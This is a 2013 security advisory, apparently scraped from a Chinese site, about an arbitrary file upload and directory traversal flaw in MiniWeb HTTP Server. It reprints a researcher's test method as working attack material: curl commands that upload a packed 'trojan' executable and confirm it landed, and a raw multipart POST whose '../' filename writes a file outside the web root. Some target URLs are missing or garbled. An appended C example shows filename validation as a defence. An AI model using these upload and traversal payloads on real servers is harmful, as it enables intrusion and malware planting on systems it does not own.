Release date: 2013-04-09
Updated: 2013-04-10
Affected systems:
sourceforge MiniWeb HTTP Server 0.x
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58946
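MiniWeb is a miniature web server developed for embedded applications, written in C.
MiniWeb HTTP Server 20130309 and other versions contain a security vulnerability that an attacker can exploit to upload malicious files to arbitrary locations on the server.
<*Source: Akastep
Link:
*>
Test method: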
--------------------------------------------------------------------------------
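Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Akastep () provided the following test method: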
Arbitrary File Upload:
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ curl -I
curl: (52) Empty reply from server
user@myhost /cygdrive/c/dir1/dir2
$ curl
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='https://www.linuxidc.com/Linux/'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Uploading remotely our trojan to remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=https://www.linuxidc.com/taskmgr.exe -F filedata=@taskmgr.exe
:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html
<html><head><title>404 Not Found</title></head><body><h1>Not
Found</h1><p>The requested URL has no content.</p></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='https://www.linuxidc.com/Linux/'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
r><td width=35%><a href='https://www.linuxidc.com/taskmgr.exe'>taskmgr.exe</a></td><td
width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by
MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ #Lol our trojan (taskmgr.exe) uploaded successfully) This is design
flaw.
user@myhost /cygdrive/c/dir1/dir2
$ curl >task2.exe
user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX
compressed
user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe
METHOD: POST
URL:
Directory Traversal:
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------78522398122376
Content-Length: 84906
request body:
-----------------------------78522398122376
Content-Disposition: form-data;
-----------------------------78522398122376
Content-Disposition: form-data;
-----------------------------78522398122376
Content-Disposition: form-data;;
filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png
Dude! Your machine OwnEd!
-----------------------------78522398122376
Content-Disposition: form-data;
Upload
-----------------------------78522398122376--
================================================================================
Few Printscreens:
1remotesystem.PNG
2attackersends.PNG
3remotesystempwned.PNG
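
The directory traversal request above carries `../` sequences in the multipart `filename` field. The following C sketch shows the check an upload handler needs before it builds a path from that field; it is an added example, not MiniWeb's code and not part of the original advisory. The function names and the `/srv/uploads` root are hypothetical, and the sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not MiniWeb code): returns 1 if a client-supplied
 * upload filename is a single plain path component, 0 otherwise. */
int upload_name_is_safe(const char *name)
{
    size_t len;
    if (name == NULL) return 0;
    len = strlen(name);
    if (len == 0 || len > 255) return 0;
    /* "." and ".." are directory references, never file names. */
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        /* No separators (POSIX or Windows), no drive/stream colon,
         * no control characters. */
        if (c == '/' || c == '\\' || c == ':' || c < 0x20 || c == 0x7f) return 0;
    }
    /* Windows silently strips trailing dots and spaces from names. */
    if (name[len - 1] == '.' || name[len - 1] == ' ') return 0;
    return 1;
}

/* Builds "<root>/<name>" into out only when the name passes the check.
 * Returns 0 on success, -1 if the name is rejected or out is too small. */
int build_upload_path(const char *root, const char *name, char *out, size_t outlen)
{
    int n;
    if (!upload_name_is_safe(name)) return -1;
    n = snprintf(out, outlen, "%s/%s", root, name);
    if (n < 0 || (size_t)n >= outlen) return -1;
    return 0;
}

int main(void)
{
    /* Constructed samples; the first is the filename from the request above. */
    const char *samples[] = {
        "../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt",
        "..\\..\\x.txt", "C:evil.txt", "/abs/path.txt", "report.png"
    };
    char path[512];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = build_upload_path("/srv/uploads", samples[i], path, sizeof path);
        printf("%-62s -> %s\n", samples[i], rc == 0 ? path : "REJECTED");
    }
    return 0;
}
```

The name check covers only the traversal case; the unauthenticated upload shown in the first test also needs access control on the upload handler itself.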